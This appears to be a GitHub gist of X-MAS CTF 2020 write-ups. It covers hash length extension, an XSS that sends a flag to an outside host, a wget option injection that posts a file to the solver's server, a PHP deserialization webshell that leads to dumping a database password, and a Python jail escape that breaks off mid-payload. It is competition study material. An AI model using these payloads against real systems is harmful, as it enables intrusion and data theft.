Skip to content

Instantly share code, notes, and snippets.

@03sunf
Last active Dec 23, 2020
Embed
What would you like to do?
X-MAS CTF 2020

cat_clicker

We must have at least 13 cats to purchase Flags, and you cannot get more than 12 cats. In addition, the state variable containing the cat count information is verified with a hash and cannot be manipulated.

state: 12 | 0
hash: cf13ab76afb625f7f7d6c539c2cb3c84

...

state: 12 | 12
hash: 9579729592f72a075bb61f63b8ea238e

There is also a .git directory under the web root so we can dump all the committed source code.

<?php

function hashFor($state) {
    $secret = getenv("SECRET_THINGY"); // 64 random characters - impossible to guess
    $s = "$secret | $state";
    return md5($s);
}


function verifyState($state, $hash) {
    return $hash === hashFor($state);
}


function getCatsNo($state) {
    $arr = explode(" | ", $state);
    return intval(end($arr));
}


function getParentsLimit($state) {
    $arr = explode(" | ", $state);
    return intval(reset($arr));
}

?>
# /api/buy.php
include('helper.php');

$state = $_POST['state'];
$hash = $_POST['hash'];
$itemId = $_POST['item_id'];

if(!isset($state) || !isset($hash) || !isset($itemId) || !verifyState($state, $hash, true) || ($itemId !== "1" && $itemId !== "2")) {
    echo json_encode(array('success' => false));
    die();
}

$cats = getCatsNo($state);
$item = "";
$ok = true;

if($itemId === "1") {
    if($cats >= 1) {
        $cats -= 1;
        $item = "FAKE-X-MAS{fake-flag-dont-submit-signed-yakuhito}";
    } else {
        $ok = false;
    }
} else {
    if($cats >= 13) {
        $cats = 1337;
        $item = getenv("FLAG");
    } else {
        $ok = false;
    }
}
$parentsLimit = getParentsLimit($state);
$newState = "$parentsLimit | $cats";
$newHash = hashFor($newState);

if($ok === true) {
    echo json_encode(array('state' => $newState, 'hash' => $newHash, 'success' => $ok, 'item' => $item));
} else {
    echo json_encode(array('success' => false));
}

?>

The hash value is generated by the hashFor function with 64bytes random salt, and the hash param is verified through the verifyState function. Also, looking at the getCatsNo function, it returns the last value of the array through the end function after explode. So we can bypass that logic and handle suffix with Length Extension Attack.

fetch('/api/buy.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'item_id=2&state=12%20%7C%201%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00H%02%00%00%00%00%00%00%20%7C%20777&hash=dfbd80d86042f767d4cbdc38015e2d5a'
}).then((x) => x.text()).then((x) => console.log(x));
/*
{"state":"12 | 1337","hash":"52586134e945c681089af25c36a1866f","success":true,"item":"X-MAS{1_h4v3_s0_m4ny_c4t5_th4t_my_h0m3_c4n_b3_c0ns1d3r3d_4_c4t_sh3lt3r_aaf30fcb4319effa}"}
*/
X-MAS{1_h4v3_s0_m4ny_c4t5_th4t_my_h0m3_c4n_b3_c0ns1d3r3d_4_c4t_sh3lt3r_aaf30fcb4319effa}

Comfort Bot

engine.getCleverResponse will be called when some message is started with !.

# bot.py
	elif (message.content.startswith ("!")):
		spell = True
		response = await engine.getCleverResponse (authorID, message.content[1:])

Also getCleverResponse function called cleverDriver.getCleverResponse.

async def getCleverResponse (authorID, message):
	if (authorID == 0):
		return random.choice(["Oh, I quite certainly agree.", "There, there, it's alright.", "Oh!", "Fascinating!", "Exquisite reply!", "Running program: COMFORT.", "Understandable.", "Hmm.", "I see.", "Well, if you really think that...", "What are you doing?", "What are you up to?", "What's that?", "[Nodding]", "[Nodding and stroking chin saying mhmm]"])
	else:
		return await parseUsers (cleverDriver.getCleverResponse (authorID, message))

It runs with Headless Crhome, and we can trigger XSS because we can handle txt variable.

async def getCleverResponse (authorID, txt):
	global driver

	try:
		driver.execute_script("window.open('http://localhost/','_blank');")
		windows[authorID] = driver.window_handles[-1]
		switchToAuthorWindow(authorID)
		
		script = "cleverbot.sendAI('{0}')".format (txt)
		driver.execute_script (script)
		while (driver.execute_script ("return cleverbot.aistate") != 0):
			await asyncio.sleep (0.4)
			switchToAuthorWindow(authorID)

		reply = driver.execute_script ("return cleverbot.reply")
		switchToAuthorWindow(authorID)
		driver.execute_script("window.close()")
		driver.switch_to_window(driver.window_handles[0])
		return reply
	except:
		CreateCleverDriver ()
!03sunf');fetch('/flag').then(x=>x.text()).then(x=>fetch('//cve.kr?flag='+x));('
149.28.40.196 - - [13/Dec/2020:09:36:24 +0000] "GET /?flag=**X-MAS{0h_J1nk135!!!Why_w0uld_y0u_br34k_our_commun4l_b07???125184ae}** HTTP/1.1" 777 52 "http://localhost/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/83.0.4103.116 Safari/537.36"
X-MAS{0h_J1nk135!!!Why_w0uld_y0u_br34k_our_commun4l_b07???125184ae}

flag_checker

only strings are allowed that is in $example_flag, also checkFlag function verify only lowercase. so we can add options with ${IFS}.

<?php
/* flag_checker */
include('flag.php');

if(!isset($_GET['flag'])) {
    highlight_file(__FILE__);
    die();
}

function checkFlag($flag) {
    $example_flag = strtolower('FAKE-X-MAS{d1s_i\$_a_SaMpL3_Fl4g_n0t_Th3_c0Rr3c7_one_karen_l1k3s_HuMu5.0123456789}');
    $valid = true;
    for($i = 0; $i < strlen($flag) && $valid; $i++)
        if(strpos($example_flag, strtolower($flag[$i])) === false) $valid = false;
    return $valid;
}


function getFlag($flag) {
    $command = "wget -q -O - https://kuhi.to/flag/" . $flag;
    $cmd_output = array();
    exec($command, $cmd_output);
    if(count($cmd_output) == 0) {
        echo 'Nope';
    } else {
        echo 'Maybe';
    }
}

$flag  = $_GET['flag'];
if(!checkFlag($flag)) {
    die('That is not a correct flag!');
}

getFlag($flag);
?>
http://challs.xmas.htsp.ro:3001/?flag=${IFS}--post-file${IFS}flag.php${IFS}-${IFS}03sunF.coM${IFS}
POST / HTTP/1.1
User-Agent: Wget/1.20.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 141.164.53.158
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

<?php
$flag = "X-MAS{s0_fL4g_M4ny_IFS_bb69cd55f5f6}";
?>
X-MAS{s0_fL4g_M4ny_IFS_bb69cd55f5f6}

Gnome's Buttons v4

Guessing chall. We can find a green button after refresh a few times.

<p><a class="btn btn-success" href="?start=1" role="button">Details anzeigen &raquo;</a></p>

After follow link, new button is apear again.

<p><a class="btn btn-success" href="?start=1&role=user&start=1" role="button">View details &raquo;</a></p>

You can get this message when you set params.

Het lijkt erop dat je niet de juiste start hebt gehad ... houd daar rekening mee!
# translation -> Looks like you didn't get off to the right start ... keep that in mind!

We can bruteforce start number easily.

from requests import get

account = ['user', 'admin']
length  = [5360, 5481, 5641, 5681, 5682, 5683, 5703, 5956, 6002]

for x in range(100000):
    for y in range(len(account)):
        res = get('http://challs.xmas.htsp.ro:3006/?start={}&role={}'.format(x, account[y]))

        if len(res.text) not in length:
            print(f'FIND NUMBER -> {x}, ROLE -> {admin[y]}, LENGTH -> {len(res.text)}')

        else:
            print(f'TRYING {x}\r', end='')
            
/*
FIND NUMBER -> 1, ROLE -> user, LENGTH -> 5791
FIND NUMBER -> 2020, ROLE -> admin, LENGTH -> 5671
FIND NUMBER -> 2020, ROLE -> user, LENGTH -> 5646
*/

We can see this message when we set params.

NICHT ERLAUBT! Der echte Administrator wird über diesen Vorfall benachrichtigt.
# translation -> NOT ALLOWED! The real administrator will be notified of this incident.

Also there is hidden filed on html source.

<p hidden>whitepaper-bhEU2011.pdf</p>

You can notice this pdf is about Parameter Pollution when you google filename. so we can easily bypass verification.

http://challs.xmas.htsp.ro:3006/?start=2020&role=user&role=admin
X-MAS{idontwannafindbugsintheamericanlanguageanymore}

How Brutus stole Christmas

The challenge site looks like ctf platform, and there are two web challenges on the platform. It's code of first challenge.

<?php

if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    die();
}

class pageContent{
  private $file_name;
  private $newContent;

  function __construct() 
  { 
    $this->file_name="data/content.txt"; 
    $file = file_get_contents($this->file_name);
    $this->newContent=$file;
  } 

  function __toString(){
      return $this->newContent;
  }

  function setContent($newContent){
    $this->newContent=$newContent;
  }

  function __destruct() 
  { 
    $fd=fopen($this->file_name,"w");
    fwrite($fd,$this->newContent);
    fclose($fd);
  } 
}

function setFooter(){
  if(isset($_GET['newFooter'])){
    $newFooter=unserialize(base64_decode($_GET["newFooter"]));
    echo '<div class="footer" style="color: white">'.$newFooter.'</div>';
  }
  else{
    echo '<div class="footer" style="color: white">PWNgyan 2020!</div>';
  }
}

$page = new pageContent;
echo $page;
setFooter();
?>

We can write webshell on data directory with unserialize vuln.

http://challs.xmas.htsp.ro:3050/?newFooter=TzoxMToicGFnZUNvbnRlbnQiOjI6e3M6MjI6IgBwYWdlQ29udGVudABmaWxlX25hbWUiO3M6MTU6ImRhdGEvMDNzdW5mLnBocCI7czoyMzoiAHBhZ2VDb250ZW50AG5ld0NvbnRlbnQiO3M6MTU6Ijw/PWAkX0dFVFt4XWA/PiI7fQ==

Also we can check that the challenges on the same server with the platform. so we can access ctf platform's database with credential.

$ cat /var/www/ctfx/include/config/db.default.inc.php
<?php

/**
 *
 * This file contains default configuration.
 *
 *        DO NOT MAKE CHANGES HERE
 *
 * Copy this file and name it "db.inc.php"
 * before making any changes. Any changes in
 * db.inc.php will override the default
 * config. It is also possible to override
 * configuration options using environment
 * variables. Environment variables override
 * both the default settings and the hard-coded
 * user defined settings.
 *
 */

Config::set('MELLIVORA_CONFIG_DB_ENGINE', 'mysql');
Config::set('MELLIVORA_CONFIG_DB_HOST', 'localhost');
Config::set('MELLIVORA_CONFIG_DB_PORT', 3306);
Config::set('MELLIVORA_CONFIG_DB_NAME', 'mellivora');
Config::set('MELLIVORA_CONFIG_DB_USER', 'mellivora');
Config::set('MELLIVORA_CONFIG_DB_PASSWORD', 'rac9138cn98ascnascud');


$ mysql -D mellivora -u mellivora -prac9138cn98ascnascud -e "select * from challenges;
id	added	added_by	title	category	description	exposed	available_from	available_until	flag	case_insensitive	automark	points	initial_points	minimum_points	solve_decay	solves	num_attempts_allowed	min_seconds_between_submissions	relies_on
1	1606078385	1	Brutus	1	Everyone hates Brutus! But does Brutus hate everyone? Who knows? Or rather, who cares?! What we care about here is the flag. Nothing more.
\n
\nLink: [url]http://challs.xmas.htsp.ro:3050[/url]	1	1584699200	1617235206	pwngyanctf{we_dont_remember_the_actual_flag_:(}	0	1	500	500	50	100	2	0	5	0
2	1606081056	1	Hard Challenge	1	Now it's time for a ramp-up in difficulty. You thought Brutus was hard? Ha! Check this one out then, punk.
\n
\nLink: [url]http://challs.xmas.htsp.ro:3051[/url]	1	1584699200	1617235206	X-MAS{Brutus_why_d1d_y0u_h4v3_t0_h4v3_RCE_113c41afe0}	0	1	500	500	50	100	1	0	5	0
3	1606081136	1	Hello World!	2	Welcome to PWNgyan CTF 2020!
\n
\n[b]pwngyanctf{H3ll0_H4ckerz_3141cc5f}[/b]	1	1584699200	1617235206	pwngyanctf{H3ll0_H4ckerz_3141cc5f}	0	1	10	10	10	1	26	0	5	0
X-MAS{Brutus_why_d1d_y0u_h4v3_t0_h4v3_RCE_113c41afe0}

Krampus's Lair

Python jail escape challenge, we can only use abceghimnorstuvw(),/. But the important thing is that we can use the setattr and the getattr method.

setattr(time, 'bad', ().class.base.subclasses())

setattr(time,min(set(vars())),getattr(getattr(getattr((),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int))))))))())

setattr(time,'bad',time.bad.pop(190))

setattr(time,min(set(vars())),getattr(getattr(time,min(set(vars()))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time)))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c))))

getattr(time,'bad')(ls)

getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))) = ls

getattr(time,'bad')((ls,/chall))

getattr(time,min(set(vars())))((getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(va